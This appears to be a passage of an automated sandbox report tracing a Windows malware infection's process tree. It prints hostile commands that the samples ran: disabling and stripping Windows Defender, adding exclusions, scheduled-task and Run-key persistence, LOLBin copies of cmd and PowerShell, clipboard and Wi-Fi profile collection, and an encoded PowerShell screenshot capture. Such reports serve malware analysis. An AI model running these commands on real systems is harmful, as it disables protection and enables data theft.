  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      --user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --headless --remote-debugging-port=9222 --profile-directory="Default"
      4⤵
      Uses browser remote debugging
      Drops file in Program Files directory
      PID:3688
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x12c,0x130,0x134,0x108,0x138,0x7ffe67e846f8,0x7ffe67e84708,0x7ffe67e84718
        5⤵
        
        PID:4452
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1116,2238468048094813877,17718652027473130930,131072 --disable-features=PaintHolding --headless --headless --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --override-use-software-gl-for-tests --mojo-platform-channel-handle=1496 /prefetch:2
        5⤵
        
        PID:2156
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1116,2238468048094813877,17718652027473130930,131072 --disable-features=PaintHolding --lang=en-US --service-sandbox-type=none --use-gl=swiftshader-webgl --headless --mojo-platform-channel-handle=1840 /prefetch:3
        5⤵
        
        PID:4648
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9222 --allow-pre-commit-input --field-trial-handle=1116,2238468048094813877,17718652027473130930,131072 --disable-features=PaintHolding --disable-databases --lang=en-US --headless --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=4 --mojo-platform-channel-handle=1960 /prefetch:1
        5⤵
        Uses browser remote debugging
        
        PID:2892
- - C:\Users\Admin\AppData\Local\Temp\a\cozyrem.exe
    "C:\Users\Admin\AppData\Local\Temp\a\cozyrem.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:3280
- - C:\Users\Admin\AppData\Local\Temp\a\believe.exe
    "C:\Users\Admin\AppData\Local\Temp\a\believe.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4288
- - C:\Users\Admin\AppData\Local\Temp\a\CONVERTER.exe
    "C:\Users\Admin\AppData\Local\Temp\a\CONVERTER.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:1192
- - C:\Users\Admin\AppData\Local\Temp\a\muk.exe
    "C:\Users\Admin\AppData\Local\Temp\a\muk.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:1864
- - C:\Users\Admin\AppData\Local\Temp\a\1776871603.exe
    "C:\Users\Admin\AppData\Local\Temp\a\1776871603.exe"
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    PID:1988
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c start cmd /C "ping localhost -n 1 && start C:\Users\Admin\AppData\Local\explorer.exe"
      4⤵
      System Network Configuration Discovery: Internet Connection Discovery
      PID:4876
    - - C:\Windows\system32\cmd.exe
        
        cmd /C "ping localhost -n 1 && start C:\Users\Admin\AppData\Local\explorer.exe"
        5⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:1220
      - C:\Windows\system32\PING.EXE
        
        ping localhost -n 1
        6⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:4376
      - C:\Users\Admin\AppData\Local\explorer.exe
        
        C:\Users\Admin\AppData\Local\explorer.exe
        6⤵
        Executes dropped EXE
        
        PID:1176
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c schtasks.exe /create /tn "Coast" /tr "wscript //B 'C:\Users\Admin\AppData\Local\TradeSecure Innovations\TradeHub.js'" /sc minute /mo 5 /F
        7⤵
        
        PID:4540
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks.exe /create /tn "Coast" /tr "wscript //B 'C:\Users\Admin\AppData\Local\TradeSecure Innovations\TradeHub.js'" /sc minute /mo 5 /F
        8⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:4924
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /k echo [InternetShortcut] > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TradeHub.url" & echo URL="C:\Users\Admin\AppData\Local\TradeSecure Innovations\TradeHub.js" >> "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TradeHub.url" & exit
        7⤵
        
        PID:8044
- - C:\Users\Admin\AppData\Local\Temp\a\thawdtyh.exe
    "C:\Users\Admin\AppData\Local\Temp\a\thawdtyh.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Adds Run key to start application
    - System Location Discovery: System Language Discovery
    PID:4900
  - - C:\Users\Admin\AppData\Roaming\update\uptime.exe
      "C:\Users\Admin\AppData\Roaming\update\uptime.exe"
      4⤵
      Executes dropped EXE
      Adds Run key to start application
      System Location Discovery: System Language Discovery
      PID:4844
- - C:\Users\Admin\AppData\Local\Temp\a\nyoilsafkjawd.exe
    "C:\Users\Admin\AppData\Local\Temp\a\nyoilsafkjawd.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Adds Run key to start application
    - System Location Discovery: System Language Discovery
    - Modifies registry class
    PID:240
  - - C:\Users\Admin\AppData\Roaming\firefox tsms\app.exe
      "C:\Users\Admin\AppData\Roaming\firefox tsms\app.exe"
      4⤵
      Executes dropped EXE
      Adds Run key to start application
      Suspicious use of SetThreadContext
      System Location Discovery: System Language Discovery
      Suspicious behavior: MapViewOfSection
      Suspicious use of SetWindowsHookEx
      PID:3316
    - - C:\Windows\SysWOW64\rmclient.exe
        
        rmclient.exe
        5⤵
        
        PID:772
- - C:\Users\Admin\AppData\Local\Temp\a\crossings.exe
    "C:\Users\Admin\AppData\Local\Temp\a\crossings.exe"
    3⤵
    - Adds policy Run key to start application
    - Checks computer location settings
    - Executes dropped EXE
    - Adds Run key to start application
    - System Location Discovery: System Language Discovery
    - Modifies registry class
    PID:5668
  - - C:\Users\Admin\AppData\Roaming\firefox tsm\firefox tsm.exe
      "C:\Users\Admin\AppData\Roaming\firefox tsm\firefox tsm.exe"
      4⤵
      Adds policy Run key to start application
      Executes dropped EXE
      Adds Run key to start application
      Suspicious use of SetThreadContext
      System Location Discovery: System Language Discovery
      Suspicious behavior: MapViewOfSection
      PID:1820
    - - \??\c:\program files (x86)\internet explorer\iexplore.exe
        
        "c:\program files (x86)\internet explorer\iexplore.exe"
        5⤵
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious behavior: MapViewOfSection
        Suspicious use of SetWindowsHookEx
        
        PID:3096
      - C:\Windows\SysWOW64\rmclient.exe
        
        rmclient.exe
        6⤵
        
        PID:404
- - C:\Users\Admin\AppData\Local\Temp\a\boilfdsefSQ.exe
    "C:\Users\Admin\AppData\Local\Temp\a\boilfdsefSQ.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:3136
- - C:\Users\Admin\AppData\Local\Temp\a\casse.exe
    "C:\Users\Admin\AppData\Local\Temp\a\casse.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    PID:1476
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
      "C:\Users\Admin\AppData\Local\Temp\a\casse.exe"
      4⤵
      PID:1928
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 1476 -s 692
      4⤵
      Program crash
      PID:952
- - C:\Users\Admin\AppData\Local\Temp\a\vcc.exe
    "C:\Users\Admin\AppData\Local\Temp\a\vcc.exe"
    3⤵
    PID:2164
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\\Users\\All Users\\3183.cmd""
      4⤵
      PID:6504
    - - C:\Windows\SysWOW64\esentutl.exe
        
        C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o
        5⤵
        
        PID:6276
    - - C:\Users\Public\alpha.pif
        
        C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows "
        5⤵
        
        PID:6280
    - - C:\Users\Public\alpha.pif
        
        C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows \SysWOW64"
        5⤵
        
        PID:6292
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\\Users\\All Users\\11775.cmd""
      4⤵
      PID:776
    - - C:\Windows \SysWOW64\svchost.pif
        
        "C:\Windows \SysWOW64\svchost.pif"
        5⤵
        
        PID:6424
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\\Users\\All Users\\NEO.cmd""
        6⤵
        
        PID:6636
        
        C:\Windows\system32\extrac32.exe
        
        extrac32.exe /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.pif"
        7⤵
        
        PID:6368
        
        C:\Users\Public\xkn.pif
        
        C:\\Users\\Public\\xkn.pif -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath 'C:\'"
        7⤵
        
        PID:6440
    - - C:\Windows\SysWOW64\PING.EXE
        
        ping 127.0.0.1 -n 10
        5⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:5812
  - - C:\Users\Admin\Links\daphpvwO.pif
      C:\\Users\\Admin\\Links\daphpvwO.pif
      4⤵
      PID:7600
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 7600 -s 12
        5⤵
        Program crash
        
        PID:7492
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe"
    3⤵
    PID:4376
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe"
      4⤵
      PID:2824
    - - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1988 -parentBuildID 20240401114208 -prefsHandle 1916 -prefMapHandle 1908 -prefsLen 27416 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {b63523ed-ce0a-4e95-af9d-2b8d290a11b0} 2824 "\\.\pipe\gecko-crash-server-pipe.2824" gpu
        5⤵
        
        PID:6056
    - - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2396 -parentBuildID 20240401114208 -prefsHandle 2364 -prefMapHandle 2308 -prefsLen 27294 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {2f0ae0ac-e9e9-43c4-9921-0aa334effb5a} 2824 "\\.\pipe\gecko-crash-server-pipe.2824" socket
        5⤵
        
        PID:6004
    - - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3160 -childID 1 -isForBrowser -prefsHandle 3036 -prefMapHandle 3216 -prefsLen 27435 -prefMapSize 244658 -jsInitHandle 1296 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {28855dc3-5e05-4eb9-a445-bf1b4fc24b8c} 2824 "\\.\pipe\gecko-crash-server-pipe.2824" tab
        5⤵
        
        PID:912
    - - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3616 -childID 2 -isForBrowser -prefsHandle 3716 -prefMapHandle 3712 -prefsLen 32668 -prefMapSize 244658 -jsInitHandle 1296 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {408ca2c8-da25-41aa-870e-2c4d30ede7df} 2824 "\\.\pipe\gecko-crash-server-pipe.2824" tab
        5⤵
        
        PID:4564
    - - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4884 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4928 -prefMapHandle 4924 -prefsLen 32668 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {cb77b35d-850f-411d-b9c2-00798800441e} 2824 "\\.\pipe\gecko-crash-server-pipe.2824" utility
        5⤵
        
        PID:6904
    - - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5408 -childID 3 -isForBrowser -prefsHandle 5480 -prefMapHandle 5476 -prefsLen 27226 -prefMapSize 244658 -jsInitHandle 1296 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {69eddd7b-6845-41cc-8238-9e1b7ade8275} 2824 "\\.\pipe\gecko-crash-server-pipe.2824" tab
        5⤵
        
        PID:6520
    - - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5656 -childID 4 -isForBrowser -prefsHandle 5576 -prefMapHandle 5584 -prefsLen 27226 -prefMapSize 244658 -jsInitHandle 1296 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f2d18304-952d-4053-b323-28b165b2c19b} 2824 "\\.\pipe\gecko-crash-server-pipe.2824" tab
        5⤵
        
        PID:6532
    - - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5848 -childID 5 -isForBrowser -prefsHandle 5768 -prefMapHandle 5776 -prefsLen 27226 -prefMapSize 244658 -jsInitHandle 1296 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {9b7b990b-a512-4f11-b464-3cfbc9e3f6f8} 2824 "\\.\pipe\gecko-crash-server-pipe.2824" tab
        5⤵
        
        PID:6560
- - C:\Users\Admin\AppData\Local\Temp\a\nioxxy.exe
    "C:\Users\Admin\AppData\Local\Temp\a\nioxxy.exe"
    3⤵
    PID:2976
- - C:\Users\Admin\AppData\Local\Temp\a\niox.exe
    "C:\Users\Admin\AppData\Local\Temp\a\niox.exe"
    3⤵
    PID:6348
  - - C:\Users\Admin\AppData\Local\Temp\a\niox.exe
      "C:\Users\Admin\AppData\Local\Temp\a\niox.exe"
      4⤵
      PID:6780
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\a\niox.exe'"
        5⤵
        
        PID:7136
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\a\niox.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6432
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
        5⤵
        
        PID:7132
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6476
      - C:\Program Files\Windows Defender\MpCmdRun.exe
        
        "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
        6⤵
        Deletes Windows Defender Definitions
        
        PID:5812
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\  .scr'"
        5⤵
        
        PID:5228
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\  .scr'
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3720
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        5⤵
        
        PID:6360
      - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        6⤵
        Enumerates processes with tasklist
        
        PID:6580
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        5⤵
        
        PID:4656
      - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        6⤵
        Enumerates processes with tasklist
        
        PID:6444
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
        5⤵
        
        PID:4792
      - C:\Windows\System32\Wbem\WMIC.exe
        
        WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
        6⤵
        
        PID:7232
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
        5⤵
        Clipboard Data
        
        PID:524
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-Clipboard
        6⤵
        Clipboard Data
        
        PID:7260
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        5⤵
        
        PID:6164
      - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        6⤵
        Enumerates processes with tasklist
        
        PID:7416
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        5⤵
        
        PID:928
      - C:\Windows\system32\tree.com
        
        tree /A /F
        6⤵
        
        PID:7368
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
        5⤵
        System Network Configuration Discovery: Wi-Fi Discovery
        
        PID:5864
      - C:\Windows\system32\netsh.exe
        
        netsh wlan show profile
        6⤵
        System Network Configuration Discovery: Wi-Fi Discovery
        
        PID:7348
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "systeminfo"
        5⤵
        
        PID:7120
      - C:\Windows\system32\systeminfo.exe
        
        systeminfo
        6⤵
        Gathers system information
        
        PID:7404
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
        5⤵
        
        PID:6096
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0